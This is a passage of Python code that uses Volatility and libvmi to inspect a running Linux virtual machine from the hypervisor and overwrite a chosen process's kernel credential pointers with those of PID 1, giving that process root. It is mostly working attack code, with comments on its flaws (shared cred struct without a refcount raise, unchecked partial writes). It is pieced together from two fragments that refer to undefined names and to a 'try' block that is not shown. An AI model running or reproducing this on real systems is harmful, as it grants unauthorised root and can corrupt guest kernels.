                                                                                       
import sys

import volatility.addrspace as addrspace
import volatility.obj as obj
import volatility.registry as registry
import volatility.utils as utils
                                                                                       
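registry.PluginImporter()
registry.register_global_options(config, addrspace.BaseAddressSpace)

## Main program starts here:
# Initialize the guest address space from the Volatility config (same as
# a=addrspace() in linux_volshell); its profile provides symbol lookups.
a = utils.load_as(config)
p = a.profile

# Kernel symbol for the static init_task (PID 0, "swapper").  The symbol
# names the task_struct itself, so the object is built directly at that
# address -- no list_head-to-container adjustment is needed.
task_addr = p.get_symbol("init_task")
if task_addr is None:
    raise SystemExit("profile has no 'init_task' symbol; wrong --profile?")
init_task = obj.Object("task_struct", vm=a, offset=task_addr)

# Walk init_task->tasks.  As in linux_pslist this yields every process
# *except* init_task itself, and ->tasks links thread-group leaders only,
# so other threads of a multi-threaded target keep their own cred.
l = list(init_task.tasks)
if not l:
    raise SystemExit("init_task->tasks is empty; address space or profile is wrong")

from libvmi import Libvmi

# Argument layout is fixed by the caller: argv[5] is the libvmi VM name and
# argv[6] the target PID.  Validate up front rather than failing with an
# IndexError/ValueError after the guest has already been introspected.
if len(sys.argv) < 7:
    raise SystemExit("usage: ... <vm-name> <target-pid>  (argv[5], argv[6])")
try:
    target_pid = int(sys.argv[6])
except ValueError:
    raise SystemExit("target PID must be an integer, got %r" % sys.argv[6])

vmi = Libvmi(sys.argv[5])

# Donor credentials: the first task after swapper is normally PID 1 (init),
# whose real_cred is root -- check with pslist on an unfamiliar guest.  Take
# the pointer's integer value explicitly; libvmi expects a plain int, not a
# Volatility Pointer object.
t_cred_init = l[0].real_cred.v()

found = False
for t in l:
    if t.pid == target_pid:
        found = True
        # Physical address of the target's real_cred *field*.  vtop() yields
        # None when the page is not mapped in Volatility's view of the guest
        # page tables; never hand that to the hypervisor-side write.
        t_cred_pa = a.vtop(t.real_cred.obj_offset)
        if t_cred_pa is None:
            raise SystemExit("real_cred of PID %d is not mapped; refusing to write" % target_pid)
        # Hypervisor-side write: bypasses every guest-side check.  Caveats:
        #  * only real_cred is rewritten; cred (the subjective set most
        #    permission checks consult) is untouched -- compare the second
        #    listing below, which writes both;
        #  * the donor's cred struct is now shared by two tasks without its
        #    refcount being raised, so put_cred() when either exits can drop
        #    it below its true user count (use-after-free hazard in the guest);
        #  * the guest keeps running between vtop() and the write, so the
        #    task may have exited or the page been remapped by then.
        vmi.write_64_pa(t_cred_pa, t_cred_init)
        break  # PIDs are unique in ->tasks; nothing more to do

if not found:
    raise SystemExit("no task with PID %d in init_task->tasks" % target_pid)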
	
    # Resolve the task_struct for the requested PID.  get_task() is defined
    # elsewhere in this file; the check below assumes it returns a falsy
    # value on a miss.
    target_task = get_task(addr_space, target_pid)
    if not target_task:
        print("Task with PID {} not found!".format(target_pid))
        # NOTE(review): sys.exit() with no argument exits with status 0, so a
        # scripted caller cannot tell this miss apart from success.
        sys.exit()

    # Donor task.  PID 1 (init in the initial PID namespace) normally runs as
    # root, but that is a convention rather than a kernel guarantee -- confirm
    # with pslist on an unfamiliar guest before borrowing its credentials.
    task_with_root = get_task(addr_space, 1)

    # Get Physical addresses for root task credentials pointers, i.e. of the
    # real_cred / cred *fields* inside the task_struct (not of the cred
    # structs themselves; the pointer values are read from them below).
    root_real_cred_pa, root_cred_pa = get_credentails_pa(
        addr_space, task_with_root)

    # Get physical addresses for target task credentials pointers
    target_real_cred_pa, target_cred_pa = get_credentails_pa(
        addr_space, target_task)

    # Initialize libvmi for writing.  Note: the library prints an unwanted
    # "[][][]" on initialisation (author's observation).
    vmi = Libvmi(pvm_name)

    # Write root "cred" pointer value to "cred" attribute of the target task.
    # The 8-byte pointer is read through Volatility's address space and
    # copied verbatim through libvmi -- both must be looking at the same live
    # guest.  The target now *shares* root's cred struct rather than getting
    # its own copy; its kernel refcount is not raised, so put_cred() when
    # either task exits can drop it below the real number of users
    # (use-after-free hazard inside the guest).
    root_cred_pointer = addr_space.read_long_long_phys(root_cred_pa)
    vmi.write_64_pa(target_cred_pa, root_cred_pointer)

    # Write root "real_cred" pointer value to "real_cred" attribute of the
    # target task (objective creds; cred above is the subjective set most
    # permission checks consult, which is why both are rewritten).
    root_real_cred_pointer = addr_space.read_long_long_phys(root_real_cred_pa)
    vmi.write_64_pa(target_real_cred_pa, root_real_cred_pointer)

    # Neither write is checked individually: a failure on the second one
    # (e.g. a None physical address from a translation miss upstream) lands
    # in the handler below after the first write has already been applied,
    # leaving the target with mismatched cred / real_cred.
    print("\nSuccess!")

# Boundary handler for the whole try body above (the try: line itself is not
# in view).  Broad on purpose for a one-shot tool, but it reports a partial
# write as a plain failure.
except Exception as e:
    print("\nFailed to change UID: {}".format(str(e)))